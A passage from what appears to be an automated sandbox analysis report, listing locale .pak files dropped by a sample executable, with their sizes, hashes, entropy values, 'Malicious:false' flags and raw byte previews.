                                                                                                                                                                                            Preview:.........(..e.....h.....i.!...j.+...k.:...l.E...n.M...o.R...p._...q.e...r.q...s.....t.....v.....w.....y.?...z.m...|.....}................................................. .....!.....".....$.....3.....?.....M....._...........w.................P...................................T.....s...........\.......................g.......................C.....l.................a.................N................."............ ....H ....a ..... ....$!....X!....m!.....!....C"....."....."....0#.....#.....$.....$.....$.....$.....$.....%....W%.....%.....%.....%....(&....u&.....&.....&.....'....e'.....'.....'.....(...._(.....(.....(.....(....G)....q).....).....).....*....C*....S*.....*.....+....4+....H+.....+....@,.....,.....,.....,....G-....f-....|-.....-..........7.....[............/....K/....^/...../....O0.....0.....0....&1....i1.....1.....1.....2....x2.....2.....2....B3.....3.....3.....3....g4.....4....95....R5.....5....C6.....6.....6....&7.....7.....7.....7....*8....t8.....8.....8....,9.....9.....9

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ru.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):996315
                                                                                                                                                                                            Entropy (8bit):4.845331047532895
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:4I6pfQjRo4YSWPAY+zJ9LF1WAati/16HzW/yqSvDsNL4kXew+YHVeXN2hVO3j/iH:4T25H3Oc
                                                                                                                                                                                            MD5:E9AF20A6226511CD535888846A2BB16F
                                                                                                                                                                                            SHA1:739A46269F334ECC291BAE6777F0B7C8E271E4C0
                                                                                                                                                                                            SHA-256:5DB640C6C288D9FC79012A7670301A3BC463359C17BA200AEDAA56260EF8D955
                                                                                                                                                                                            SHA-512:7897C500718382F08D55F3CDDD96D1451524B5C2B8FEBC65E1700A645598B622C819EC66E4A21C119F044FAAA525A2ABDDDF66D0C9800AF6ECEA9CEB217A88BB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(d.e.....h.....i.....j.....k.....l.....n.....o.....p.%...q.+...r.7...s.f...t.}...v.....w.....y.....z.3...|.Z...}...............................................................................$.....<.....c.....X.....$...............................................D.............................G...........0...........8.....[.................Q.....h...... ..... .....!....J!....=".....#.....#.....#....z$.....%...._%.....%....;&.....&.....'....A'.....'.....(....#)....P)....T*....N+.....+.....,.....,....0-....]-.....-............................_/...../...../.....0.....0.....1....X1....}1....#2.....2.....2...."3.....3....%4....`4....w4.....4....t5.....5.....5....B6.....6.....6.....7.....8.....8...._9.....9.....:.....:.....:.....:....T;.....;.....;.....;....|<.....=.....=.....=.....>.....?.....?.....?....|@.....@.....A.....A.....A....GB.....B.....B.....C.....C....mD.....D....jE...."F.....F.....F.....G.....H.....I....lI.....J.....J.....J.....J....xK.....K....&L....?L.....M.....M....4N

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\sk.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):626605
                                                                                                                                                                                            Entropy (8bit):5.815043408006658
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:6fKTvoktDh40i/igVQm5611wYZLtWTjsxt9Wl:6KTdjib5ewsPtIl
                                                                                                                                                                                            MD5:B0BBB6661370D27B6600EBE98CADB9AC
                                                                                                                                                                                            SHA1:1139852DA47048F15C16EB101DAC86DFC8F652BA
                                                                                                                                                                                            SHA-256:E0FE4130E668AC659D5334C5BC8CDE70BBA8742273B5965836860B5A8B1B016A
                                                                                                                                                                                            SHA-512:C8EAC323552F873EC088F77B8C46522387B0298B6D566CF8AA173FA9B2D66389068BB26E46044AF2FAA4224B39DC748164843B58B99E9DDE093FCB32AFB5FED0
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.:...k.I...l.T...n.\...o.a...p.n...q.t...r.....s.....t.....v.....w.'...y.N...z.|...|.....}.....................................!.....(...../.....0.....1.....3.....G.....O.....a.....v.....2...........N.....l...........M.................'.........................................6.................4.....G.................).....=.................K.....p.............................z ..... ....,!....E!.....!....("....^"....o"....."....v#.....#.....#....d$.....$....B%....]%.....%.....&....3&....H&.....&.....'..../'....A'.....'.....(....)(....;(.....(.....)....Y)....o).....)....L*.....*.....*.....*....X+.....+.....+.....+....u,.....,.....,.....-.....-.....-.....-....s...........D/....\/...../...../.....0....+0.....0.....0.....0.....1.....1.....1.....2....#2.....2.... 3....e3.....3.....3....C4...._4....t4.....4....R5....y5.....5.....6.....6.....6.....6.....7.....8.....8.....8.....9.....9.....9.....9....O:.....:.....:.....:....L;.....;.....;.....;...._<.....<.....=

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\sl.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):601837
                                                                                                                                                                                            Entropy (8bit):5.489524001909229
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:mZ9VfcB2z/i1SE5vqfCWJU171i/fzSjqc:mHVBWSE5vqfmi/fzSl
                                                                                                                                                                                            MD5:AA7C0F35B61A230D65E498DAAB67388C
                                                                                                                                                                                            SHA1:F60CB1C7128A1FB1CFD9AA029F96DF36033777D0
                                                                                                                                                                                            SHA-256:03AFC83CDBA98C08AF169C8AE111AA916F3EE6D5A2FEE4954EF35ECC063F2B21
                                                                                                                                                                                            SHA-512:048D03C490F18D22F4900363F9C4ABEE037A2029F226C90806064FFEDC85B07A1D86225B9C534311B08F588632A84221D7E4FA355E7B768CFDFD6102C5FFE705
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k."...l.-...n.5...o.:...p.G...q.M...r.Y...s.....t.....v.....w.....y.'...z.U...|.|...}...............................................................................,.....<.....O...........n.................J...................................N.....m...........9.....m.................8.....c.....p...........+.....V.....e...........G.....|........... .......................]............ ..... ..... ..... ....%!....9!.....!....3"....j"....."....$#.....#.....#.....$....v$.....$.....$.....$....T%.....%.....%.....%....?&.....&.....&.....&....K'.....'.....'.....(....n(.....(.....).....).....).....)....;*....P*.....*.....+....:+....M+.....+.....,....B,....Q,.....,....,-....i-.....-.....-....8.....X.....p............/....;/....V/...../.....0....\0....n0.....0....O1.....1.....1.....2....l2.....2.....2.....3....x3.....3.....3....34.....4.....4.....4.....5..../6.....6.....6....j7.....7....@8....}8.....8....T9.....9.....9.....9....;:....Y:....i:.....:....I;.....;

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\sr.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):924863
                                                                                                                                                                                            Entropy (8bit):4.7696519516761695
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:nP3ydDCzsexx7UinNLQIlApSld7vwFi4CBaAwH5YvTEquCxa4F37nyIzy/k/S:P3G2zBTfWt5suBr
                                                                                                                                                                                            MD5:ABDD9EB966D915C1896B31CBA0B2656B
                                                                                                                                                                                            SHA1:CB0080E5F2C168CD0F3EDC6ED6C47734FFD67790
                                                                                                                                                                                            SHA-256:3913D3BE5016CE873AC68AF376D5FCF558BB5F5F29A9BC56DF0099BA47E52486
                                                                                                                                                                                            SHA-512:BCB258D6DA766BB6F00DFDBB03BC878000D9CF28B2B707375CE52485DB9C530A34D1528A1473F09B5765BC57ABD847F191BDE55646EB707443CD0E40509B70E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e. ...h.(...i.9...j.E...k.T...l._...n.g...o.l...p.y...q.....r.....s.....t.....v.....w.2...y.Y...z.....|.....}...............................%.....,.....3.....:.....;.....<.....>.....h................................... .....R.................#.....F.....A.............................M.......................) ....| ..... ....(!.....!.....!.....!....."....b#.....#.....#.....$.....%....=&.....&....C'.....'....B(....k(....').....).... *....E*....++.....+....b,.....,.....-....y....../....V/...../....V0.....0.....0....B1.....1.....1.....2.....2.....3....G3....f3....*4.....4....+5....V5.....5.....6.....6.....6.....7.....8....Q8....l8.....9.....9.....9.....9.....:.....;....n;.....;....[<.....=.....=.....=....E>.....>.....>.....?.....?....%@....^@.....@....EA.....A....$B....AB.....C.....C.....D....\D.....D....eE.....E.....E.....F.....G....lG.....G....xH.....H....yI.....I.....J....fK.....K.....L.....M.....M....!N....kN....%O.....O.....P....%P.....P.... Q....XQ....uQ....FR.....R....[S

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\sv.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):541025
                                                                                                                                                                                            Entropy (8bit):5.5401177610527155
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:MnZyPzw0uHrwiTR91Q0Z4IoogVChcxorsl6hI+vRFcz5RtGl2KYF4bkvMrOSOgfm:i8U7DTC0Z4KhJW5krMTMo
                                                                                                                                                                                            MD5:CC0806219798E3ADE0437219457A37AB
                                                                                                                                                                                            SHA1:DD6BA47E14B7B0D08159FBCA2409B013DC2E17DE
                                                                                                                                                                                            SHA-256:79A7260C8651FF3024E21F9263543BF4E9D5F3574E81CF96EDF6388F8DA85CD1
                                                                                                                                                                                            SHA-512:DF3DA02BB2FECBBAF1AB80AF8EF8B1A7AE9F6C7ED01F94C5A502720376924132C344DD716FC5B4DDC03733A6C3581ED8D8A577154C619BA85C527DC67F4A48C2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........p(..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.8...t.O...v.....w.....y.....z.....|.,...}.]...........................................................................................................Y.....o...........B.........................................e.......................r.......................r...................................1.....Q...........?.......................].................. ....x ..... ..... ....E!.....!....."....#"....."....N#.....#.....#.....$....n$.....$.....$.....$....O%....t%.....%.....%....-&....S&....b&.....&....2'....i'....{'.....'....6(....d(....s(.....(....()....S)....b).....).....*....C*....S*.....*.....+....H+....W+.....+....*,....e,....z,.....,....%-....E-....^-.....-.....-..........1.....}.......................u/...../.....0....D0.....0.....0.....1....-1.....1.....1.....2....&2.....2.....2.....3....03.....3....44.....4.....4.....5.....5.....5.....5....W6.....6.....6.....6....F7.....7.....7.....7.....8.....8.....8

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\sw.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):570564
                                                                                                                                                                                            Entropy (8bit):5.341574755821131
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:Evzozr9Cpdjcu25KmedqrCBfRdpG5PbQW49qx2FRyl+Y4jNUkCarOg6jP5AuNskZ:Evk3v15zsI
                                                                                                                                                                                            MD5:A63EF2C4676DFBEE98E29A84A7AD9D27
                                                                                                                                                                                            SHA1:2F0F4B33ACF5E63F3159C62C74DEAA9A361203F4
                                                                                                                                                                                            SHA-256:7B8C51B247DEA72D68CB0EF4292800C13209DA6F859A9AD289C996582F19E65C
                                                                                                                                                                                            SHA-512:CD65FD2C49D35757DE648F21DEC748FB4A1D13D2308552774FE9C859AD5748B21F5DB449F8B380520F27DC868A3EBAAFD58D4C45ABA34033785777D342E17E6F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.!...j.-...k.<...l.G...n.O...o.T...p.a...q.g...r.s...s.....t.....v.....w.....y.A...z.o...|.....}.................................................".....#.....$.....).....;.....K....._.....v.............................U...................................L.....b.................I.....].................2.....A.......................).................*.....P...........N.................%.......................3 ..... ..... ..... ....4!.....!.....!.....!....q"....."....J#....f#.....#.....$....8$....S$.....$.....$.....%.....%....Z%.....%.....%.....%....L&.....&.....'.....'....m'.....'.....'.....(....n(.....(.....).....)....l).....).....).....)....X*.....*.....*.....*....q+.....+....",....;,.....,.....,.....-....6-.....-.....-....).....J............/....F/....V/...../....20....{0.....0.....1....N1....o1.....1.....1....02....X2....j2.....2....F3.....3.....3....04.....4.....5.....5.....5.....5....>6....[6.....6....P7.....7.....7.....8....j8.....8.....8....89.....9.....9

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ta.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1468553
                                                                                                                                                                                            Entropy (8bit):4.052663401346278
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:eO7hLhGq5MLs32+5CrVKa1i55G62sRtRdutm1vYpiMy+:rdLhGoC+sBD1i554sRtRdutm1vYpiMy+
                                                                                                                                                                                            MD5:AA06EAD1200F01C9460399F0ABE2D54F
                                                                                                                                                                                            SHA1:9B852C4691209C0AE9EDF94A5DEC4B902FEC7B3E
                                                                                                                                                                                            SHA-256:1946D903918C57836D2F898EF93CD1D575DA1A464E358C399DFDE73EA2EF057E
                                                                                                                                                                                            SHA-512:6E556B962C16AEE22695D93B62B308D95B0695873FB33D13A147B3D8B6791C9599DAA6E3BF424A1897212A018AB36DD8C8214C2EB03457048C6931686BE40E04
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........w(..e.....h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.F...t.]...v.....w.....y.....z.....|.:...}.k.............................................................................).....i...........e...........G.....y.............................}...... .....!.....!....D#....z$.....%....H%....I&....<'.....'.....'.....(.....).....*..../*....g+....k,.....,....V-...........0.....0....21....S2....i3.....4....O4.....5.....6....[7.....7.....8....5:.....;....d;.....<.... >.....?....m?....p@....9A.....A.....A.....B.....C.....D....<D....$E.....E....ZF.....F.....G.....H....UI.....I.....J.....K.....L....<L....*M.....N.....N.....N.....O.....P.....Q....KQ....ER....6S.....S.....S....>U.....V....kW.....W.....X.....Y.....Z....CZ....&[.....[....J\.....\....p]....Y^....$_....q_.....`.....a....+b.....b.....c....Nd.....d.....d.....f...."g.....g.....h.....i.....j....tk.....k.....m.....o.....q....Pq.....r.....s....nt.....t....Nv....tw....$x.....x.....y....vz.....z....6{....h|.....}....5~

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\te.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1359248
                                                                                                                                                                                            Entropy (8bit):4.307321925100967
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:RG0y8Y7McKNW0yR5D7FgpC8ybtKRT5sbvkW3p/8WffhBp3p1FPnzTitlF2iDk7Pi:RGB+s5RNHFy
                                                                                                                                                                                            MD5:A4ACCC25DD8A00BC57DF4FCA12E41295
                                                                                                                                                                                            SHA1:9466888034C9E6ECF4113DDDA63D363ED20E3156
                                                                                                                                                                                            SHA-256:157D646525F6A9AC267466631671E65E9B5C3E55B008B564186E64C6853E52AA
                                                                                                                                                                                            SHA-512:F19116655B6C2BB5C572B45F1D712FA1F9D57D9E8963FB3D654ED3781BD34A4E937B590BCC1119A318E28632DA12A0EF8B36F6426791DE833898CF7F30189567
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.:...h.B...i.\...j.h...k.w...l.....n.....o.....p.....q.....r.....s.....t.....v.)...w.U...y.|...z.....|.....}.......+.....0.....8.....@.....H.....O.....V.....].....^....._.....d.......................^.......................D.................".....q............ ..... ....6!....s".....#....+$....f$....H%.....%....D&....y&.....'....X(.....(.....)....'*.....*....l+.....+....O-....y.....E/...../.....0.....1....e2.....2.....3.....4....i5.....5.....7....C8....A9....~9.....:....d<....D=.....=.....>....:?.....?.....?.....@.....A.....B....]B....qC....6D.....D.....D....3F.....G.....G.....H....5I.....J.....J.....J.....K.....L....>M.....M.....N....nO.....O....%P....KQ.....R.....R.....R....8T.....U.....U.....V.....W.....W.....X....`X....+Y.....Y.....Y....,Z.....Z.....[....h\.....\.....].....^....._....#`....$a.....a....4b.....b.....c.....d....#e....pe.....f....sg.....h....Vh....(j.....k.....l....!m.....n.....o....op.....p....6r....#s.....s.....t.....u.....u....?v.....v.....w.....x.....y

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\th.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1142703
                                                                                                                                                                                            Entropy (8bit):4.350453098899463
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:X6cnN9LyZYAPTKznL/4svUSynUGevuB5Uz0dNL3fRj8NRU+wunRUdGILV+w11LAn:X05ANf
                                                                                                                                                                                            MD5:B18E4574DB917920ECCFB8E6900D0662
                                                                                                                                                                                            SHA1:554206B9E639135074B0946FB28B6FFE2D934159
                                                                                                                                                                                            SHA-256:C14FA1BB30C880216D6CFEA6FB738235CF72A3FE8BE919C3D61321D5A5883211
                                                                                                                                                                                            SHA-512:5F427F9ED85BB368B45BAFD523C634E18596E430FDC380563878D2CA897CF2580D0405F7C0D8E10ABBA389BB7125978A81D335263BB777E0EE0BFE3D47C8C65F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........'..e.8...h.@...i.H...j.S...k.b...l.h...o.p...p.}...q.....r.....s.....t.....v.....w.6...y.]...z.....|.....}.........................$.....,.....1.....9.....@.....G.....N.....P.....U.....y.................<.....M.....$.......................`.............................h.......................]...........P............ ....> ..... ....Z!.....!.....!.....".....#.....$.....$....y%.....&.....&.....&.....'....R(.....(.....(.....)....f*.....*.....*.....+....t,.....,.....-....F.....5/...../....30.....1.....1.....1....82.....3.....3.....4....@4.....5.....5.....5.....6.....6.....7.....8....A8.....9.....9....4:....X:....$;.....;....E<....l<.....=.....=.....>..../>.....?.....?....%@....L@....fA....cB....'C....OC.....D.....D.....D.....E.....E....JF.....F.....F....hG.....G....OH.....H.....I....TJ.....J....ZK.....K....oL.....L.....L.....M....<N.....N.....N.....O....KP.....P.....Q.....R.....R.....S.....S.....U.....V.....V....$W.....X.....X....HY....xY.....Z.....Z....![....@[....I\.....].....]

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\tr.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):581275
                                                                                                                                                                                            Entropy (8bit):5.614415854351588
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:A9dM9N/9/UHzNsgkDQqZFtQSJ8kJ5MLJy:0eZb8kJ50Jy
                                                                                                                                                                                            MD5:82C6A14BA1B28F947BEE67BC3FEAB091
                                                                                                                                                                                            SHA1:25023B22EAED29D0817EC95D5BCB4AD3D724F5AD
                                                                                                                                                                                            SHA-256:099507F6F2A2C98ECCE275F8AD956EEEEAADA65B7788356301AF04A0CD7D431E
                                                                                                                                                                                            SHA-512:988A9275B7A05D100CA9242DD05969D2363A42938D47DB37A1F62EC1874E96B640C14B272F1829AB5C6E0D2763C22FBF0AF99894D4D9D32726925EABBC02C05E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.~...h.....i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.-...v.b...w.....y.....z.....|.....}.;.....d.....i.....q.....y...................................................................................k.................K................. .......................Y.......................].......................D.......................N...................................3.....P............ ....G ....X ..... .....!....6!....F!.....!....2"....u".....".....#.....#.....#.....#....D$.....$.....$.....$....D%.....%.....%.....%....A&.....&.....&.....&....A'.....'.....'.....'....T(.....(.....(.....)....b).....).....).....*...._*.....*.....*.....*....\+.....+.....+.....+.....,.....-....R-....k-.....-....1.....^.....z...........$/....F/....a/...../.....0....C0....U0.....0....,1....f1.....1.....1....52....T2....d2.....2....(3....S3....h3.....3....<4.....4.....4....C5.....5....[6....m6.....6....r7.....7.....7....o8.....8....)9....E9.....9.....:....9:....N:.....:....';....`;

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\uk.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):996487
                                                                                                                                                                                            Entropy (8bit):4.873979205850633
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:1x/vKIH9mGGHWK9TddsSr+whF5gZrZEdIIXgOb5YB3Ijwl2Ab+rUcauHLNiXErqx:3/vXH9ynh5BrI
                                                                                                                                                                                            MD5:EC3AA18A9D9C989B1025DDDB0FA52B55
                                                                                                                                                                                            SHA1:AB3B0834CABEE34BC2F9FD04104B10E5F9C102CA
                                                                                                                                                                                            SHA-256:EE67744C26E0C69FBED8B102ADD339070AABC70C2D8CA9EA037C6C9D23B66D3B
                                                                                                                                                                                            SHA-512:90D40424B050C6C7ACE113E85B0B0A58472967C50A14FBC6637CD3B2DB8FF3F521CC94DCD256FA017684256E8A9C19B158AAA57F6D3094FAB970578D3B1C6847
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........[(..e.t...h.|...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.%...v.Z...w.....y.....z.....|.....}.3.....\.....a.....i.....q.....y...........................................................7....."...........x...........\...........b...........W.............................&.................q...........X.....}...... ..... .....!.....!.....!....f".....".....".....#.....$....'%....c%.....&.....&.....'....5'.....'....t(.....(.....(.....)....a*.....*.....*.....+.....,....8-....r-..........k.................\/...../.....0....90.....0....81....v1.....1....H2.....2....F3....m3.....4.....4.....4.....4.....5.....6....R6....k6.....6....z7.....7.....7....n8.....8....<9....W9....P:.... ;.....;.....;....}<.....<....A=....c=.....=....9>....b>.....>....5?.....?....T@....o@....dA.....B.....B.....C.....C.....D....<D....iD.....E.....E.....E.....F.....F....]G.....G.....H.....H.....I....hJ.....J....wK....;L.....L.....M.....M....DN.....N.....N....EO.....O.....P.....P.....P.....Q.....R

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\ur.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):870809
                                                                                                                                                                                            Entropy (8bit):5.161712117251234
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:wtiyilnG/Uo458PMzCR4FXdQLN9AyTibR45GO6EhTCWORJlbQYrMYVwadcJKwURn:Vyie5T5/Cgu
                                                                                                                                                                                            MD5:CB228CC41981E8BCBD2768DA20026912
                                                                                                                                                                                            SHA1:C55BB999C4C1FBEE5E38B6C986FBCE2B128F3880
                                                                                                                                                                                            SHA-256:A7D825FE348700528800EF9EA7940EE8027373E9C05A4E51E526D0A213C05429
                                                                                                                                                                                            SHA-512:85308806BE53494683F32520E181DD9C8C9ABAC0B92BC439D4E30EEF22D4AF993794A9719DD9A4EEED0BBCAF61C0E2342E7D4ED5D30B504572BD2BC269100E2E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(..e.....h.....i.....j.....k.!...l.,...n.4...o.9...p.F...q.L...r.X...s.....t.....v.....w.....y.&...z.T...|.{...}.........................................................................&.....@.....^...........Z.......................w.....!.......................G.......................N.................k...........7.....X...........g ..... ..... ....d!.....!....%"....R".....#.....#.....$....Q$.....$.....%.....%.....&.....&....L'.....'.....'.....(....W).....).....*.....*.....+....7,....h,.....,....H-.....-.....-....+.......................q/...../.....0....90.....0....Z1.....1.....1....a2.....2....A3...._3.....3....j4.....4.....4....U5.....5.....6....)6.....6....47.....7.....7....d8.....9.....9.....9....Q:.....:.....;....=;.....;.....<....K<....y<.....=.....=.....=.....=.....>....@?.....?.....?....x@.....@....%A....HA.....A.....B.....B.....B.....C....GD.....D.....D.....E....xF.....F....!G.....H.....H....-I....lI....7J.....J....4K....bK.....K....qL.....L.....L.....M.....N....oN

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\vi.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):689415
                                                                                                                                                                                            Entropy (8bit):5.7905904014606335
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12288:v8/9MO+cGZoEK9VaZLlFK0FgxBxJbTsIxvx5a8h/9cDNUOnmzi0HRva8Z1lc:vSSO+cG6V4lE0uxHZH5a899yiOnwi01k
                                                                                                                                                                                            MD5:045241A62232BAE57F1D57C6C3AF7C55
                                                                                                                                                                                            SHA1:5C2A1A677A8BDFA20F3577335131BD4B89A46355
                                                                                                                                                                                            SHA-256:56758C918BBFE6A9D5B20E8B4A7248BDF2D43E0BF5F98E85A9892FF03DBC2D99
                                                                                                                                                                                            SHA-512:8E30AF44A53A36A194DA16A756DFF0F90EFBEF164277BDCDE683C89A3CDC04AE5E1298475E8A098D19DAB73EB0A71637F676D49D237C5480E1F7ACA1765166BB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:........P(..e.^...h.f...i.....j.....k.....l.....n.....o.....p.....q.....r.....s.....t.....v.M...w.y...y.....z.....|.....}.&.....O.....T.....\.....d.....l.....s.....z...........................................................O.................r...........G.....^.......................*...........+.....}.................?.....e.....q...........G.................2.............................. .....!.....!.....!....?"....."....."..../#.....#.....#.....$.....$....;%.....%.....%....t&.....'....q'.....'.....(....o(.....(.....(....').....).....).....)....B*.....*.....*.....*.....+.....+....E,....\,.....,....2-....i-....z-.....-....D.....x.................Q/...../...../.....0....v0.....0.....0....r1.....2....x2.....2.....3.....3.....3.....3....V4.....4.....4...._5.....5.....6....+6.....6....h7.....7.....8.....8.....9....89....Z9.....9....W:.....:.....:....N;.....;.....<....+<.....<....s=.....=.....=.....>....Y?.....?.....?....u@.....@.....A....,A.....A.....A....2B....FB.....B....xC.....C.....C

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\zh-CN.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):496499
                                                                                                                                                                                            Entropy (8bit):6.685741162993645
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:rr0PPN0s9IHFKwowzwAEM7i56Ez2bHy1t59Lo3/4oT2Paq8lc:XGNXUKwTzwx956Ez2bH05Nov4oTUV
                                                                                                                                                                                            MD5:798BC7D8B63906C5B1C67E89AD17DC58
                                                                                                                                                                                            SHA1:B39C86D6D3FD9D8B8DA90D86F827A0C0803FBA8C
                                                                                                                                                                                            SHA-256:1C05280D8DCDFE99619695B76DD054292A90C1A93A5CFB92CDC4A5B0068A7092
                                                                                                                                                                                            SHA-512:7A21AF438823D562B889D7C99F639421E01F0536E95F3206DD53D2C8DED82B7A4AB74BB9B4262B2FA27E50EFD8DD7719827AD2E6B6D4C2E0D0811930027ED982
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.........(U.e.....h.....i.....j.....k.+...l.2...m.:...o.a...p.f...q.l...r.x...s.....t.....v.....w.....|.F...}.w.........................................................................................%...........6.......................U.......................\.......................e.......................d......................./.....V.....c.................6.....P...........+.....l.....~...........:.....n.....{........... .....I.....U.................;.....M..........." ....` ....r ..... .....!.....!....5!.....!.....!.....!.....!....D"....."....."....."....!#.....#.....#.....#....)$....{$.....$.....$.....%....a%.....%.....%.....%....?&....g&....s&.....&.....'....A'....M'.....'....3(....t(.....(.....(....#)....C)....W).....).....)....$*....;*.....*.....*.....+....(+.....+.....+.....,....),....u,.....,.....,.....,....E-.....-.....-.....-....E.......................a/...../.....0....,0.....0.....0....01....E1.....1.....1.....2....*2....v2.....2.....2.....2....H3.....3.....3.....3....D4

                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\7z-out\locales\zh-TW.pak

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Users\user\Desktop\YoS6ZBCcUy.exe
                                                                                                                                                                                            File Type:data
